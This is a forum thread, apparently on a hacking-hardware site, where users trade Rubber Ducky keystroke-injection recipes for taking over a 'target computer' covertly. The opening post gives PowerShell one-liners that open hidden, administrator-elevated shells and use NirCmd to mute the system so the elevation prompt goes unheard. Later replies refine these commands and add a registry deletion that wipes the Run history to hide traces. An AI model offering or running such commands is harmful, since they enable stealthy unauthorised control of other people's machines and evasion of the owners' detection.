Jump to content

Extra Stealth and NirCmd


Recommended Posts


Before anything else, I should mention that I am new to all of this (my Rubber Ducky hasn't even arrived yet), but I've been digging around and I think I've come up with a pretty decent alternative to hiding windows in Windows (without having them scroll down and out of sight, which is very unstealth-like). Like I've mentioned, my Rubber Ducky hasn't arrived yet, so I haven't gotten around to learning the script to its fullest for that reason I'm going to be sharing what the ducky should do, step-by-step, instead of the actual inject.bin.

The Stealth enhancer:

After having the Ducky open the run command (GUI + R) instead of having it write something like "cmd" or "powershell", give this a try and see for yourself:

powershell -windowstyle hidden start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

Now you have to make the ducky go LEFT and ENTER to accept opening powershell as administrator.

You can still catch a few glimpses of the 2 powershell windows that get open, but they immediately disappear. Although it's not visible, one of the windows IS STILL OPEN so long as you don't click anywhere else. To prove that the powershell running as administrator is still open, type this out (without quotes,it's important that you type it): "start-process notepad.exe", this will open the notepad.

This works fine all my computers (Windows 8 and 10), I'm not sure about others, please let me know.

Removing the "Run as Admin" sound:

Some computers have this annoying warning sound when the box to confirm to run something as admin pops-up. This sound is specially annoying if you want to go undetected.

There are two alternatives:

1) You could make the Ducky type "FN + ESC", this will mute or unmute the computer. The problem with this option is that, if the target computer is already muted, this will produce the contrary effect of the desired one. So if you are using this one, make sure the target computer is not muted.

2) For this one we need the help of a tool called NirCmd, this tool is, I believe, a great asset for the Rubber Ducky users. The potential for pranks is enormous. Here's what to do:

- First of all, you should get NirCmd: http://www.nirsoft.net/utils/nircmd.zip

- Unzip the file and copy the "nircmd.exe" or "nircmd" to the Rubber Ducky's SD card.

- Next make the Rubber Ducky run this after (GUI + R):

powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit

What this does is open a hidden powershell, mutes the system, the dialog box pops up, a hidden administrator run powershell opens (closing the previous one) and restores sound to the system.

Alternatively, you could run this (if you don't want to restore sound to the system and keep it muted):

powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

WARNING: Make sure to change "F:/nircmd/nircmd.exe" to whatever path your nircmd.exe file has on your ducky.

Other applications for nircmd:

- open and hide apps. (Open notepad and hide it, but it remains active and you can write whatever you want as long as you don't click anywhere else)

start-process notepad.exe; F:/nircmd/nircmd.exe win hide class notepad

I don't know the full extent of this "hide" feature I tried it with google chrome, but I didn't know the "class" so it didn't work. Play around with it and let me know.

- show hidden apps.

F:/nircmd/nircmd.exe win show class notepad

- Make the computer read a text file (Cool Prank)

F:/nircmd/nircmd.exe speak file "c:\temp\speak.txt"

This is all I have had time to play with in the past few days, please point out any mistakes I might have made and let me know on your ideas. Play around with NirCmd's other features and share it here.

Sorry for the messy post.

Link to comment
Share on other sites

Great job on finding the windowstyle hidden argument for PowerShell. I'm not sure your idea with nircmd will work because the ducky doesn't mount as a drive on a computer. It registers as a HID only. Maybe something like Twin Duck will help make this work.

It works with Twin Duck ...

Edited by LukasS
Link to comment
Share on other sites

I've noticed that the script that mutes and restores sound to the system loses track- so to speak- of the powershell window.

powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit

To solve this, you should use the one that just mutes the system and afterwards make the ducky type the script that returns the sound:

powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

(And then make the ducky type:)

F:/nircmd/nircmd.exe mutesysvolume 0

Since at this point, the window is already hidden, there should be no rush to unmute the system. And this way, the ducky can continue typing in the powershell whatever you want it to.

Again: Do remember to change the " F:/nircmd/nircmd.exe" to the actual path of the file on your ducky.

Thank you for the feedback, and thank you for pointing out the need for the Twin Duck firmware.

Always happy to help :)

Link to comment
Share on other sites

To erase the run command history, simply make the ducky type this in the powershell:

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

This will erase ALL of the history, not just what the ducky did. But no one should notice and even if they do, they shouldn't find it suspicious.

To give credit where credit is due: Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...